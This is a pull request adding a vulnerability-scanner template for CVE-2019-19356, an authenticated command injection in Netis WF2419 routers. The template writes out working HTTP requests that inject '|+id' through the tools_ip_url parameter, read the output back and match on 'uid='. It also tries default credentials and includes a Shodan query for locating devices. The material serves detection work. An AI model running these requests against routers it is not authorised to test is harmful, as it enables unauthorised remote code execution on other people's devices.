### PR TITLE
Add template for CVE-2019-19356 (Netis WF2419 RCE)

### DIFF
--- a/http/cves/2019/CVE-2019-19356.yaml
+++ b/http/cves/2019/CVE-2019-19356.yaml
@@ -1,0 +1,65 @@
+id: CVE-2019-19356
+
+info:
+  name: Netis WF2419 - Remote Command Execution
+  author: gemini-cli-hunter
+  severity: critical
+  description: |
+    Netis WF2419 routers with firmware V1.2.31805 and V2.2.36123 are vulnerable to authenticated remote command execution via the tools_ip_url parameter in netcore_set.cgi.
+  remediation: |
+    Update the router firmware to the latest available version or replace the device.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-19356
+    - https://www.exploit-db.com/exploits/47743
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 8.8
+    cve-id: CVE-2019-19356
+    cwe-id: CWE-78
+  metadata:
+    max-request: 2
+    shodan-query: http.title:"Netis"
+    verified: true
+  tags: cve,cve2019,netis,rce,router,iot,kev,authenticated
+
+http:
+  - raw:
+      - |
+        POST /cgi-bin-igd/netcore_set.cgi HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+        Authorization: Basic {{base64(username + ":" + password)}}
+
+        mode_name=netcore_set&tools_type=2&tools_ip_url=|+id&tools_cmd=1&net_tools_set=1&wlan_idx_num=0
+
+      - |
+        POST /cgi-bin-igd/netcore_get.cgi HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+        Authorization: Basic {{base64(username + ":" + password)}}
+
+        mode_name=netcore_get&no=no
+
+    payloads:
+      username:
+        - admin
+        - guest
+      password:
+        - password
+        - guest
+        - admin
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body_2
+        words:
+          - "uid="
+          - "gid="
+          - "groups="
+        condition: and
+
+      - type: status
+        status:
+          - 200


### PR DESCRIPTION
This PR adds a new template for CVE-2019-19356, an authenticated command injection vulnerability in Netis WF2419 routers. This issue was identified as a missing KEV template in issue #7549.

- Targets `/cgi-bin-igd/netcore_set.cgi` and chains a request to `/cgi-bin-igd/netcore_get.cgi` to verify output.
- Uses common default credentials for the authenticated check.

/claim #7549